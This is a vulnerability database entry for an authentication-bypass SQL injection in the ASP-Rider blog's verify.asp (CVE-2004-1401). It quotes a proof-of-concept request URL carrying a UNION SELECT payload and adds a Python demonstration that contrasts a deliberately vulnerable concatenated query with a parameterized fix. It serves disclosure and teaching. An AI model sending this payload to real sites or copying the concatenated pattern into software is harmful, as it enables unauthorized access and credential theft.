ASP-Rider Remote SQL Injection Vulnerability

Vulnerability ID: 1108339
Vulnerability type: SQL injection
Published: 2004-12-14
Updated: 2005-10-20
CVE ID: CVE-2004-1401
CNNVD-ID: CNNVD-200412-1115
Platform: ASP
CVSS score: 7.5
|Vulnerability source
https://www.exploit-db.com/exploits/24840
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200412-1115
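|Vulnerability details
verify.asp in ASP-Rider contains a SQL injection vulnerability. A remote attacker can use the username parameter to execute arbitrary SQL statements and bypass authentication.
|Exploit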
source: http://www.securityfocus.com/bid/11933/info

A remote SQL injection vulnerability reportedly affects ASP-Rider Web blog. This issue is due to a failure of the application to properly sanitize user-supplied input prior to including it in SQL queries.

An attacker may exploit this issue to manipulate SQL queries to the underlying database. This may facilitate theft of sensitive information, potentially including authentication credentials, and data corruption.

http://www.example.com/weblog/blogadmin/verify.asp?username='union select 1,1,1,1,1,1,1,1 from tbl_users where ''='&password=1
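
The request above only has an effect when the username value is concatenated into the SQL text. The following added example (not ASP-Rider's code and not part of the original advisory) reproduces that pattern against a constructed in-memory SQLite table and shows the parameterized form rejecting the same input; the query shape, the column names and the plaintext password comparison are assumptions made for illustration.

```python
import sqlite3

# The username and password values from the request quoted above.
PAGE_USERNAME = "'union select 1,1,1,1,1,1,1,1 from tbl_users where ''='"
PAGE_PASSWORD = "1"


def make_db():
    """Constructed stand-in database. The table name and the eight-column
    shape come from the request above; the column names are assumed."""
    db = sqlite3.connect(":memory:")
    db.execute(
        "CREATE TABLE tbl_users (id, username, password, c4, c5, c6, c7, c8)"
    )
    db.execute(
        "INSERT INTO tbl_users VALUES (1, 'admin', 'constructed-pw', 0, 0, 0, 0, 0)"
    )
    return db


def login_concatenated(db, username, password):
    """Assumed vulnerable pattern: the parameter becomes part of the SQL text,
    so a quote in it ends the string literal and the rest is parsed as SQL."""
    sql = "SELECT * FROM tbl_users WHERE username='" + username + "'"
    row = db.execute(sql).fetchone()
    # The password column of whatever row came back is compared to the input.
    return row is not None and str(row[2]) == password


def login_parameterized(db, username, password):
    """Hardened pattern: the parameter is bound as data and never parsed as SQL."""
    row = db.execute(
        "SELECT * FROM tbl_users WHERE username = ?", (username,)
    ).fetchone()
    return row is not None and str(row[2]) == password


if __name__ == "__main__":
    db = make_db()
    for check in (login_concatenated, login_parameterized):
        print(check.__name__,
              "real login:", check(db, "admin", "constructed-pw"),
              "| page request:", check(db, PAGE_USERNAME, PAGE_PASSWORD))
```

With the concatenated query, the row of 1s supplied by the UNION is what the password check compares against, so authentication succeeds without a real account; with the bound parameter, the whole string is treated as a (nonexistent) username.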
|References

Source: XF
Name: asp-rider-verify-sql-injection(18479)
Link: http://xforce.iss.net/xforce/xfdb/18479
Source: SECUNIA
Name: 13470
Link: http://secunia.com/advisories/13470/
Source: BID
Name: 11933
Link: http://www.securityfocus.com/bid/11933
Source: BUGTRAQ
Name: 20041214 ASP-rider is vulnerable to sql injection attack
Link: http://marc.theaimsgroup.com/?l=bugtraq&m=110305802005220&w=2